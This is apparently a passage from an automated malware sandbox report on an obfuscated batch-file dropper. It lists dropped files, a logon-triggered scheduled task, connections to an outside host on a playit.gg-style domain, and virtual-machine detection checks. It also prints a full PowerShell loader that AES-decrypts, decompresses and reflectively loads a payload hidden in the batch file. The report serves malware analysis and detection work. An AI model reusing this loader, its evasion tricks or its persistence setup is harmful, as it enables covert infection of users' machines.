                        Preview:..APp..WG...o&..M\W...N.c:W...&&e'p./m.[.3..b...&H....-Zmk4X.Q..q..-S..z].....w...@..+...2...e.]......S..KJl.....5..#-..d^...j.........2.u...-Mg.K<...zJ.........T!..t.C..._....."...T40.....Nf.*x.7..z5TA.Qd..."..W}b..N9:......9..Xqpqa.hF.../.......l....h....p.<IY.I...u.Z|W.a.p.w.E...H]+..ro..t......Z9.."..c...2..8.aE.&......Y..D
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:DOS batch file, ASCII text, with very long lines (5483), with CRLF line terminators
                        Category:dropped
                        Size (bytes):5235007
                        Entropy (8bit):6.036856711369073
                        Encrypted:false
                        SSDEEP:49152:gjajLYkJeb89At9lRsiPuDb5okqs0XcoJzLQKSWrlN3krQTGq3oRn8UV:J
                        MD5:5C6DBF4219FD4E2251DE392EB2544581
                        SHA1:8F79AC10FD2BF6F5324FF9C19F278E3F9D5B4FA3
                        SHA-256:FD4270F11AFEE189662BB9BD907F3D732002A44A76AB3C356B50E0E64A4E81B4
                        SHA-512:3796219BD8F7D344AFD8684FD25A71942A37BC5511D27D50CF42AAE27C42B73C8A91A301CCAE2B52C3706ADAC27AC4529C1F6ACB38C86D0750E108374A6FDE43
                        Malicious:true
                        Preview:@echo off..%^%@%nVnlHKQvNhtczvEAdRFIlZKoSMVLvDbELLTGXIsJPhMAVSkkpeGazdenlZsUPfZkfPrNBYDuyVSdnksaCKvqXaeIHGvXqyTKiBugBwJrBlCDkbaaGsrfJJnfKJgVDFeachVLPmygbePLyBxFGurYgObz%%^%e%pwRpNNVhBBcfokuTldFTBGilApiofTngwxAQGQnqTDWavArjWeVKwFNJnGOyFHbHnWJRKEmuQoZXJiQaXYraXCKQKQCacPKlCoMzQAzsSBUhFPZfQNBHqaKKlShTbmraDNvuvrkwzYiwICkURxkood%%^%c%BEbnXtFqGjTDRtFJyDeirSncIHmcEbdMASUPudmcTICmOZtBmOLKjVDJqYEphDMEghdZzPovrcoJpboJoLQQqsCEplyvzWUqVXfHVubwzqthGTtpKVbwMWnOEyJoqTVvhYOrVGOUJtqaYvYvRjKDUyDZKrcwKNfFuYZIfbteggMtFnPiAowhjsAJuOHEErkWnLFawpqQPGxOLk%%^%h%wCUVwqYwcyqoqtOzOWQfUIOMlYGrDULXjulcKwOFppDCfbZwagIRVfzONiKyJGThMteWiMPsikQEelGjZkqwmTbeUxoBMpVIwvQMXcooqpJLpVJBBAzzqwUSrZbKynGSohiIvTmWWcgXkqPZOMamQwrZBYvXaDQ%%^%o%JRwhMagInCDoqXIakcWLnubSPihxxoVsmdnsTImNGrYnSdJDpvNYHeOpPErETJlYHlbmKpgBPjfWvNZLyDhcBWLhoYDoqIUWfaGHbxTaoljxYSUbFFfpBjxKzUXMLSkgo%%^% %QvhsKbKgNpNniweBJLDEuWCVhhzhpwbciQbyUmVdEvvhXmLBIjizCKNTSllCCDRroKesvFHwQAZZBuYVwYzfnCzychFIbtBbDdTmhsgcCLJcKOsxmpfEdMdLkFqnZYuwYYvxBLNeSwDB%%^%o%xOnPiwLnXXRZ
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Windows\System32\svchost.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3488
                        Entropy (8bit):3.585260056017724
                        Encrypted:false
                        SSDEEP:48:yei1q97eUQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCf:tenkp2Gdi3ipVA9ll7EhAMz3cHtj+
                        MD5:435BC377C9DA15F255683ADB20DBEA2F
                        SHA1:1C4B276328484F5D0653BD608B5CC9B07613DD99
                        SHA-256:0D9489B9E8BB6FF182FBFE3A617E77261DBB914F19FEBFD34F522A3C90D4B33C
                        SHA-512:A9E78D0F2A6F077C58FFF5F5E967F5D0604D8C4F786E7990842BFA9A94390A347372C79BAFBED067587DF853C3D2E05CBB3510C22F33BD5303903D28AFE2E352
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.0.9.-.2.6.T.0.7.:.4.0.:.4.0...8.9.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.c.n.t.-.s.Y.v.L.L.Q.2.I.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):85
                        Entropy (8bit):4.760508842979807
                        Encrypted:false
                        SSDEEP:3:jKMFIwpVhHzeL+z4fyM9oM3Ky:jKMFIsVE1R3Ky
                        MD5:3C9809BF686E91BA1423D06856199D4D
                        SHA1:0A554D88070D73087295C39F216A50DD65EA49EB
                        SHA-256:86F92161F9B6C2BFCF3720A3938EF4FC5891D23D7FA85DA4207E21A6F5984137
                        SHA-512:E810ECA2492A3A9C36C9C426D073DC9AA1B3F5BE39ADF51E576ADD2A876D33C08C10514C713B581093E00268CDEDD8308AC3A0CA3F7A2034E36B538339328C38
                        Malicious:false
                        Preview:Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden ..
                        Process:C:\Windows\System32\cmd.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):92
                        Entropy (8bit):4.252709127263888
                        Encrypted:false
                        SSDEEP:3:ODBA3/+KjMFAdmgLdI5L/y8pAvaKFMmIFcuyn:UA1jMF4HK5LDuvaKxNn
                        MD5:5069E03C2A38705FE08B48569929996B
                        SHA1:049F65D11E6DBE3267BBE4C0D2228C5CD643AEA8
                        SHA-256:208A7A282AFFBA4446ADEA963D1740C4D3A4D997718396D38E9FE8C912DB63BD
                        SHA-512:678A629E61A41EEF3144DB65F14B924A8A7049F76D0DF4DE56D39F30B014E65376BD9FD85CAB3F475CB521396830CB813EAAB38B3AEC6A27E4269A8FD57C738C
                        Malicious:false
                        Preview:'u' is not recognized as an internal or external command,..operable program or batch file...
                        File type:DOS batch file, ASCII text, with very long lines (5483), with CRLF line terminators
                        Entropy (8bit):6.036856711369073
                        TrID:
                        • BibTeX references (5501/1) 100.00%
                        File name:Q5N7WOpk8J.bat
                        File size:5'235'007 bytes
                        MD5:5c6dbf4219fd4e2251de392eb2544581
                        SHA1:8f79ac10fd2bf6f5324ff9c19f278e3f9d5b4fa3
                        SHA256:fd4270f11afee189662bb9bd907f3d732002a44a76ab3c356b50e0e64a4e81b4
                        SHA512:3796219bd8f7d344afd8684fd25a71942a37bc5511d27d50cf42aae27c42b73c8a91a301ccae2b52c3706adac27ac4529c1f6acb38c86d0750e108374a6fde43
                        SSDEEP:49152:gjajLYkJeb89At9lRsiPuDb5okqs0XcoJzLQKSWrlN3krQTGq3oRn8UV:J
                        TLSH:62360205EA64BDCCFD27602673C78D04EF7A5B945FA0A23272ADE1C23B497359426D0E
                        File Content Preview:@echo off..%^%@%nVnlHKQvNhtczvEAdRFIlZKoSMVLvDbELLTGXIsJPhMAVSkkpeGazdenlZsUPfZkfPrNBYDuyVSdnksaCKvqXaeIHGvXqyTKiBugBwJrBlCDkbaaGsrfJJnfKJgVDFeachVLPmygbePLyBxFGurYgObz%%^%e%pwRpNNVhBBcfokuTldFTBGilApiofTngwxAQGQnqTDWavArjWeVKwFNJnGOyFHbHnWJRKEmuQoZXJiQaX
                        Icon Hash:9686878b929a9886
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 12:20:53.420803070 CEST4970443063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:20:53.425973892 CEST4306349704147.185.221.21192.168.2.7
                        Sep 26, 2024 12:20:53.426109076 CEST4970443063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:20:53.471999884 CEST4970443063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:20:53.477803946 CEST4306349704147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:14.827409029 CEST4306349704147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:14.827516079 CEST4970443063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:14.833597898 CEST4970443063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:14.838449001 CEST4306349704147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:18.488673925 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:18.493684053 CEST4306349706147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:18.493769884 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:18.494064093 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:18.498863935 CEST4306349706147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:40.164839029 CEST4306349706147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:40.164886951 CEST4306349706147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:40.164928913 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:40.164973021 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:40.165426970 CEST4970643063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:40.170164108 CEST4306349706147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:43.566688061 CEST4970743063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:43.571773052 CEST4306349707147.185.221.21192.168.2.7
                        Sep 26, 2024 12:21:43.572072029 CEST4970743063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:43.572343111 CEST4970743063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:21:43.577169895 CEST4306349707147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:04.936001062 CEST4306349707147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:04.936070919 CEST4970743063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:22:04.936530113 CEST4970743063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:22:04.941431046 CEST4306349707147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:08.394843102 CEST4970843063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:22:08.624082088 CEST4306349708147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:08.624228001 CEST4970843063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:22:08.624555111 CEST4970843063192.168.2.7147.185.221.21
                        Sep 26, 2024 12:22:08.629326105 CEST4306349708147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:30.000740051 CEST4306349708147.185.221.21192.168.2.7
                        Sep 26, 2024 12:22:30.000808001 CEST4970843063192.168.2.7147.185.221.21
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 12:20:53.381516933 CEST6241753192.168.2.71.1.1.1
                        Sep 26, 2024 12:20:53.394795895 CEST53624171.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 26, 2024 12:20:53.381516933 CEST192.168.2.71.1.1.10x1e6fStandard query (0)fixed-noon.gl.at.ply.ggA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 26, 2024 12:20:53.394795895 CEST1.1.1.1192.168.2.70x1e6fNo error (0)fixed-noon.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:1
                        Start time:06:20:08
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:06:20:08
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:06:20:08
                        Start date:26/09/2024
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic diskdrive get Model
                        Imagebase:0x7ff7fedd0000
                        File size:576'000 bytes
                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:6
                        Start time:06:20:08
                        Start date:26/09/2024
                        Path:C:\Windows\System32\findstr.exe
                        Wow64 process (32bit):false
                        Commandline:findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
                        Imagebase:0x7ff666420000
                        File size:36'352 bytes
                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:11
                        Start time:06:20:09
                        Start date:26/09/2024
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic diskdrive get Manufacturer,Model
                        Imagebase:0x7ff7fedd0000
                        File size:576'000 bytes
                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:12
                        Start time:06:20:09
                        Start date:26/09/2024
                        Path:C:\Windows\System32\findstr.exe
                        Wow64 process (32bit):false
                        Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                        Imagebase:0x7ff666420000
                        File size:36'352 bytes
                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:13
                        Start time:06:20:11
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:06:20:11
                        Start date:26/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:17
                        Start time:07:22:22
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:07:22:22
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:19
                        Start time:07:22:22
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:20
                        Start time:07:22:22
                        Start date:26/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:07:22:23
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
                        Imagebase:0x7ff734a20000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:22
                        Start time:07:22:23
                        Start date:26/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:23
                        Start time:07:22:23
                        Start date:26/09/2024
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic diskdrive get Model
                        Imagebase:0x7ff7fedd0000
                        File size:576'000 bytes
                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:07:22:23
                        Start date:26/09/2024
                        Path:C:\Windows\System32\findstr.exe
                        Wow64 process (32bit):false
                        Commandline:findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
                        Imagebase:0x7ff666420000
                        File size:36'352 bytes
                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:07:22:24
                        Start date:26/09/2024
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic diskdrive get Manufacturer,Model
                        Imagebase:0x7ff7fedd0000
                        File size:576'000 bytes
                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:07:22:24
                        Start date:26/09/2024
                        Path:C:\Windows\System32\findstr.exe
                        Wow64 process (32bit):false
                        Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                        Imagebase:0x7ff666420000
                        File size:36'352 bytes
                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:07:22:30
                        Start date:26/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = 